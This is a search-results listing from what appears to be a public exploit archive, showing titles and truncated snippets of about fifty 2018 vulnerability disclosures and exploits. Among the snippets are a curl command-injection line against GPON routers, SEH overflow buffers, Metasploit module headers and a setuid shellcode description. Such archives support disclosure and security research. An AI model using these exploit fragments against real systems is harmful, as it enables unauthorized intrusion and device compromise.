47885 matches found
CSP MySQL User Manager 2.3.1 - Authentication Bypass
Exploit Title: CSP MySQL User Manager 2.3.1 - Authentication Bypass Date: 2018-05-04 Exploit Author: Youssef mami Vendor Homepage: https://code.google.com/archive/p/cspmum/ Software Link: https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/cspmum/cmum-231.zip Version:...
IceWarp Mail Server < 11.1.1 - Directory Traversal
Vendor: IceWarp http://www.icewarp.com Product: IceWarp Mail Server Version affected: 11.1.1 and below Product description: IceWarp WebMail provides web-based access to email, calendars, contacts, files and shared data from any computer with a browser and Internet connection. IceWarp Mail Server ...
WordPress Plugin WF Cookie Consent 1.1.3 - Cross-Site Scripting
Exploit Title: WF Cookie Consent - Authenticated Persistent Cross-Site Scripting Date: 23/04/2018 Exploit Author: B0UG Vendor Homepage: http://www.wunderfarm.com/ Software Link: https://en-gb.wordpress.org/plugins/wf-cookie-consent/ Version: Tested on version 1.1.3 older versions may also be...
Google Chrome V8 - Object Allocation Size Integer Overflow
There's an integer overflow in computing the required allocation size when instantiating a new javascript object. See the following code in objects.cc // static bool JSFunction::CalculateInstanceSizeForDerivedClass Handle function, InstanceType instancetype, int requestedembedderfields, int...
Microsoft Windows WMI - Recieve Notification Exploit (Metasploit)
This module requires Metasploit: http://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework require 'msf/core/post/windows/reflectivedllinjection' class MetasploitModule 'Windows WMI Recieve Notification Exploit', 'Description' = %q This module exploits an...
JasperReports - (Authenticated) File Read
TIBCO’s JasperReports string = wrapper.getParameterValues"page" To: getResource @ DirResourceSet.java:101 file = new File/home/rhino/jasperreports...mcat/webapps/jasperserver,"/WEB-INF/jsp/modules/administer/adminImport.jsp" Due to a lack of input validation we found ourselves with the capability...
GPON Routers - Authentication Bypass / Command Injection
!/bin/bash echo "+ Sending the Command… " We send the commands with two modes backtick and semicolon ; because different models trigger on different devices curl -k -d "XWebPageName=diag&diagaction=ping&wanconlist=0&desthost=$2;$2&ipv=0" $1/GponForm/diagForm?images/ 2/dev/null 1/dev/null echo "+...
Schneider Electric InduSoft Web Studio and InTouch Machine Edition - Denial of Service
What do you need to know? Tenable Research has discovered a critical remote code execution vulnerability in Schneider Electric’s InduSoft Web Studio and InTouch Machine Edition. What's the attack vector? The vulnerability can be remotely exploited without authentication to execute arbitrary...
Metasploit Framework - 'msfd' Remote Code Execution (Metasploit)
This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'Metasploit msfd Remote Code Execution', 'Description' = %q Metasploit's msfd-service makes it possible to get a msfconsole-like interface over a...
LibreOffice/Open Office - '.odt' Information Disclosure
!/usr/bin/python Exploit Title: Malicious ODF File Creator Date: 1st May 2018 Exploit Author: Richard Davy Vendor Homepage: https://www.libreoffice.org/ Software Link: https://www.libreoffice.org/ Version: LibreOffice 6.0.3, OpenOffice 4.1.5 Tested on: Windows 10 Quick script/POC code to create a...
WebKit - 'WebCore::jsElementScrollHeightGetter' Use-After-Free
input:enabled content: urlfoo; padding-top: 0vmin .class4 -webkit-transform: scale1, 255; function jsfuzzer document.head.appendChildkg; var test = input.scrollHeight; ::ptr const /Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x8664+0xe0a06 1 0x3000e09d8...
Call of Duty Modern Warefare 2 - Buffer Overflow
A few years ago, I became aware of a security issue in most Call of Duty games. Although I did not discover it myself, I thought it might be interesting to see what it could be used for. Without going into detail, this security issue allows users playing a Call of Duty match to cause a buffer...
Adobe Reader PDF - Client Side Request Injection
% a PDF file using an XFA % most whitespace can be removed truncated to 570 bytes or so... % Ange Albertini BSD Licence 2012 % modified by InsertScript %PDF-1. % can be truncated to %PDF-\0 1 0 obj stream 1 endstream endobj trailer /XFA 1 0 R /Pages...
Cockpit CMS 0.4.4 < 0.5.5 - Server-Side Request Forgery
SSRF(Server Side Request Forgery) in Cockpit 0.4.4-0.5.5 CVE-2018-9302 Cockpit CMS repairs CVE-2017-14611, but it can be bypassed, SSRF still exist, affecting the Cockpit CMS 0.4.4-0.5.5 versions.I've been tested success of "Cockpit CMS" lastest version. Product Download: Cockpit...
Easy MPEG to DVD Burner 1.7.11 - Local Buffer Overflow (SEH)
!/usr/bin/python Exploit Title: Easy MPEG to DVD Burner 1.7.11 SEH Local Buffer Overflow Date: 2018-05-02 Exploit Author: Marwan Shamel Software Link: https://downloads.tomsguide.com/MPEG-Easy-Burner,0301-10418.html Version: 1.7.11 Tested on: Windows 7 Enterprise SP1 32 bit Special thanks to my...
Norton Core Secure WiFi Router - 'BLE' Command Injection (PoC)
PoC command injection in BLE service of Norton Core Secure WiFi Router CVE-2018-5234 For more information read paper. To demonstrate the exploitation, we will use: - OS GNU/Linux; - Bluetooth dongle adapter; - BlueZ utility for testing Bluetooth connection. In order to use the script, we will nee...
Metasploit Framework - 'msfd' Remote Code Execution (via Browser) (Metasploit)
This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'Metasploit msfd Remote Code Execution via Browser', 'Description' = %q Metasploit's msfd-service makes it possible to get a msfconsole-like...
xdebug < 2.5.5 - OS Command Execution (Metasploit)
This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'xdebug Unauthenticated OS Command Execution', 'Description' = %q Module exploits a vulnerability in the eval command present in Xdebug versions...
TBK DVR4104 / DVR4216 - Credentials Leak
-- coding: utf-8 -- import json import requests import argparse import tableprint as tp class Colors: BLUE = '\03394m' GREEN = '\03332m' RED = '\0330;31m' DEFAULT = '\0330m' ORANGE = '\03333m' WHITE = '\03397m' BOLD = '\0331m' BRCOLOUR = '\0331;37;40m' banner = ''' ..--.. ..... .-- ..... . .": "-...
Exim < 4.90.1 - 'base64d' Remote Code Execution
!/usr/bin/python import time import socket import struct s = None f = None def logo: print print " CVE-2018-6789 Poc Exploit" print "@straightblast ; [email protected]" print def connecthost, port: global s global f s = socket.createconnectionhost,port f = s.makefile'rw', bufsize=0 def p...
WordPress Plugin Responsive Cookie Consent 1.7 / 1.6 / 1.5 - (Authenticated) Persistent Cross-Site Scripting
Exploit Title: Wordpress Responsive Cookie Consent 1.7 / 1.6 / 1.5 - Authenticated Persistent Cross-Site Scripting Date: 2018-04-20 Exploit Author: B0UG Vendor Homepage: http://www.jameskoussertari.co.uk/ Software Link: https://en-gb.wordpress.org/plugins/responsive-cookie-consent/ Version: Teste...
WordPress Plugin Form Maker 1.12.20 - CSV Injection
Exploit Title: Wordpress Plugin Form Maker version 1.12.20 vulnerable to to Formula Injection CSV Injection Google Dork: N/A Date: 27-04-2018 Exploit Author: Jetty Sairam Software Link: https://wordpress.org/plugins/form-maker/ Affected Version: 1.12.20 and before Category: Plugins and Extensions...
Nagios XI 5.2.6 < 5.2.9 / 5.3 / 5.4 - Chained Remote Root
Exploit Title: Nagios XI 5.2.6-9, 5.3, 5.4 Chained Remote Root Date: 4/17/2018 Exploit Authors: Benny Husted, Jared Arave, Cale Smith Contact: https://twitter.com/iotennui || https://twitter.com/BennyHusted || https://twitter.com/0xC413 Vendor Homepage: https://www.nagios.com/ Software Link:...
Navicat < 12.0.27 - Oracle Connection Overflow
!/usr/bin/python Title: Navicat Create new Oracle Connection paste contents of "navicatPOC.txt" into host field and test connection to trigger overflow. filename="navicatPOC.txt" junk = "A" 1502 nseh = "\x4C\x4C\x77\x04" seh= "\x75\x2a\x01\x10" nseh = "B" 4 seh = "C" 4 fill = "D" 4000 buffer = ju...
Apple macOS/iOS - ReportCrash mach port Replacement due to Failure to Respect MIG Ownership Rules
/ ReportCrash is the daemon responsible for making crash dumps of crashing userspace processes. Most processes can talk to ReportCrash via their exception ports either task or host level. You would normally never send a message yourself to ReportCrash but the kernel would do it on your behalf whe...
Drupal < 7.58 - 'Drupalgeddon3' (Authenticated) Remote Code (Metasploit)
This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'Drupalgeddon3', 'Description' = %q CVE-2018-7602 / SA-CORE-2018-004 A remote code execution vulnerability exists within multiple subsystems of...
Linux Kernel < 4.17-rc1 - 'AF_LLC' Double Free
define GNUSOURCE include include include include include include include include include include include include include include include include include include include struct sockaddrllc short sllcfamily; short sllcarphrd; unsigned char sllctest; unsigned char sllcxid; unsigned char sllcua;...
Apple macOS 10.13.2 - Double mach_port_deallocate in kextd due to Failure to Comply with MIG Ownership Rules
Here's a kextd method exposed via MIG com.apple.KernelExtensionServer kernreturnt kextmanagerunlockkextload machportt server, machportt client kernreturnt migresult = KERNFAILURE; if gClientUID != 0 OSKextLog/ kext / NULL, kOSKextLogErrorLevel | kOSKextLogIPCFlag, "Non-root kextutil doesn't need ...
MyBB Threads to Link Plugin 1.3 - Cross-Site Scripting
Exploit Title: MyBB Threads to Link Plugin v1.3 - Persistent XSS Date: 3/15/2018 Author: 0xB9 Contact: luxorforums.com/User-0xB9 or 0xB9atprotonmail.com Software Link: https://community.mybb.com/mods.php?action=view&pid=1065 Version: v1.3 Tested on: Ubuntu 17.10 CVE: CVE-2018-10365 1. Description...
Frog CMS 0.9.5 - Persistent Cross-Site Scripting
Exploit Title: Frog CMS 0.9.5 has a stored Cross Site Scripting Vulnerability via "Admin Site title" in Settings Date: 2018-04-23 Exploit Author: Wenming Jiang Vendor Homepage: https://github.com/philippe/FrogCMS Software Link: https://github.com/philippe/FrogCMS Version: 0.9.5 Tested on: php 5.6...
WordPress Plugin WP with Spritz 1.0 - Remote File Inclusion
Exploit Title: WordPress Plugin WP with Spritz 1.0 - Remote File Inclusion Date: 2018-04-25 Exploit Author: Wadeek Software Link: https://downloads.wordpress.org/plugin/wp-with-spritz.zip Software Version: 1.0 Google Dork: intitle:"Spritz Login Success" AND...
Jfrog Artifactory < 4.16 - Arbitrary File Upload / Remote Command Execution
Exploit Title: Jfrog Artifactory alert/Vulnerable/" within the file app.html : POST /artifactory/ui/artifact/upload HTTP/1.1 Host: removed User-Agent: removed Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate...
Allok AVI to DVD SVCD VCD Converter 4.0.1217 - Buffer Overflow (SEH)
Exploit Title: Allok AVI to DVD SVCD VCD Converter 4.0.1217 - Buffer Overflow SEH Date: 25.04.2018 Exploit Author:T3jv1l Vendor Homepage:http://www.alloksoft.com/ Software: www.alloksoft.com/allokavi2dvd.exe Category:Local Contact:https://twitter.com/T3jv1l Version: Allok AVI to DVD SVCD VCD...
SickRage < v2018.03.09 - Clear-Text Credentials HTTP Response
Exploit Title: SickRage v2018.03.09 - Clear-Text Credentials HTTP Response Date: 2018-04-01 Exploit Author: Sven Fassbender Vendor Homepage: https://sickrage.github.io Software Link: https://github.com/SickRage/SickRage Version: v2018.03.09-1 CVE : CVE-2018-9160 Category: webapps 1. Background...
October CMS User Plugin 1.4.5 - Persistent Cross-Site Scripting
Exploit Title: October CMS User Plugin v1.4.5 - Persistent Cross-Site Scripting Date: 2018-04-03 Author: 0xB9 Software Link: https://octobercms.com/plugin/rainlab-user Version: 1.4.5 Tested on: Ubuntu 17.10 CVE: CVE-2018-10366 1. Description: Front-end user management for October CMS. Allows...
TP-Link Technologies TL-WA850RE Wi-Fi Range Extender - Remote Reboot
Exploit Title: TP-Link Technologies TL-WA850RE Wi-Fi Range Extender | Unauthorized Remote Reboot Date: 25/04/2018 Exploit Author: Wadeek Vendor Homepage: https://www.tp-link.com/ Firmware Link: https://www.tp-link.com/en/download/TL-WA850RE.html Category: dos 1. www.shodan.io with title...
GitList 0.6 - Remote Code Execution
''' Exploit Title: GitList 0.6 Unauthenticated RCE Date: 25-04-2018 Software Link: https://github.com/klaussilveira/gitlist Exploit Author: Kacper Szurek Contact: https://twitter.com/KacperSzurek Website: https://security.szurek.pl/ Category: remote 1. Description Bypass/Exploit escapeshellarg...
Blog Master Pro 1.0 - CSV Injection
Exploit Title: Blog Master Pro v1.0 - CSV Injection Date: 2018-04-23 Exploit Author: 8bitsec CVE: CVE-2018-10255 Vendor Homepage: https://codecanyon.net/ Software Link: https://codecanyon.net/item/blog-master-pro/21689781 Version: 1.0 Tested on: Kali Linux 2.0 | Mac OS 10.13 Release Date:...
Shopy Point of Sale 1.0 - CSV Injection
Exploit Title: Shopy Point of Sale v1.0 - CSV Injection Date: 2018-04-23 Exploit Author: 8bitsec CVE: CVE-2018-10258 Vendor Homepage: https://codecanyon.net/ Software Link: https://codecanyon.net/item/shopy-point-of-sales/21730225 Version: 1.0 Tested on: Kali Linux 2.0 | Mac OS 10.13 Release Date...
Chrome V8 JIT - Arrow Function Scope Fixing Bug
/ When the parser parses the parameter list of an arrow function contaning destructuring assignments, it can't distinguish whether the assignments will be actually in the parameter list or just assignments until it meets a "=" token. So it first assigns the destructuring assignments to the outer...
HRSALE The Ultimate HRM 1.0.2 - CSV Injection
Exploit Title: HRSALE The Ultimate HRM 1.0.2 - CSV Injection Date: 2018-04-23 Exploit Author: 8bitsec CVE: CVE-2018-10257 Vendor Homepage: https://codecanyon.net/ Software Link: https://codecanyon.net/item/hrsale-the-ultimate-hrm/21665619 Version: 1.0.2 Tested on: Kali Linux 2.0 | Mac OS 10.13...
HRSALE The Ultimate HRM 1.0.2 - Local File Inclusion
Exploit Title: HRSALE The Ultimate HRM v1.0.2 - Local File Inclusion Date: 2018-04-23 Exploit Author: 8bitsec CVE: CVE-2018-10260 Vendor Homepage: https://codecanyon.net/ Software Link: https://codecanyon.net/item/hrsale-the-ultimate-hrm/21665619 Version: 1.0.2 Tested on: Kali Linux 2.0 | Mac OS...
HRSALE The Ultimate HRM 1.0.2 - 'award_id' SQL Injection
Exploit Title: HRSALE The Ultimate HRM v1.0.2 - 'awardid' SQL Injection Date: 2018-04-23 Exploit Author: 8bitsec CVE: CVE-2018-10256 Vendor Homepage: https://codecanyon.net/ Software Link: https://codecanyon.net/item/hrsale-the-ultimate-hrm/21665619 Version: 1.0.2 Tested on: Kali Linux 2.0 | Mac ...
Chrome V8 JIT - 'AwaitedPromise' Update Bug
/ Here's a snippet of AsyncGeneratorReturn. https://cs.chromium.org/chromium/src/v8/src/builtins/builtins-async-generator-gen.cc?rcl=bcd1365cf7fac0d7897c43b377c143aae2d22f92&l=650 Node const context = ParameterDescriptor::kContext; Node const outerpromise = LoadPromiseFromAsyncGeneratorRequestreq...
Drupal < 7.58 - 'Drupalgeddon3' (Authenticated) Remote Code Execution (PoC)
This is a sample of exploit for Drupal 7 new vulnerability SA-CORE-2018-004 / CVE-2018-7602. You must be authenticated and with the power of deleting a node. Some other forms may be vulnerable : at least, all of forms that is in 2-step form then confirm. POST...
HRSALE The Ultimate HRM 1.0.2 - (Authenticated) Cross-Site Scripting
Exploit Title: HRSALE The Ultimate HRM 1.0.2 - Authenticated Cross Site Scripting Date: 2018-04-23 Exploit Author: 8bitsec CVE: CVE-2018-10259 Vendor Homepage: https://codecanyon.net/ Software Link: https://codecanyon.net/item/hrsale-the-ultimate-hrm/21665619 Version: 1.0.2 Tested on: Kali Linux...
Linux/x86 - execve(cp /bin/sh /tmp/sh; chmod +s /tmp/sh) + Null-Free Shellcode (74 bytes)
Linux/x86 - execvecp /bin/sh /tmp/sh; chmod +s /tmp/sh + Null-Free Shellcode 74 bytes. Shellcode exploit for Linuxx86 platform / Title: Linux/x86 - cp /bin/sh /tmp/sh; chmod +s /tmp/sh Author: absolomb Website: https://www.sploitspren.com SLAE-ID: 1208 Purpose: cp shell into /tmp and setuid Teste...
RGui 3.4.4 - Local Buffer Overflow
!/usr/bin/python Exploit Author: bzyo CVE: CVE-2018-9060 Twitter: @bzyo Exploit Title: R 3.4.4 - Local Buffer Overflow Date: 03-27-2018 Vulnerable Software: R 3.4.4 Vendor Homepage: https://www.r-project.org/ Version: 3.4.4 Software Link: https://cloud.r-project.org/bin/windows/ Tested On: Window...
WordPress Plugin Woo Import Export 1.0 - Arbitrary File Deletion
...
Kaspersky KSN for Linux 5.2 - Memory Corruption
''' Exploit Author: Juan Sacco - http://exploitpack.com Tested on: Kali i686 GNU/Linux CVE: NotYet Exploit description: Kaspersky KSN v5.2 is prone to a remote memory corruption because it fails to properly filter the input on the remote subscribers, this leads to heap segments overwrite and it...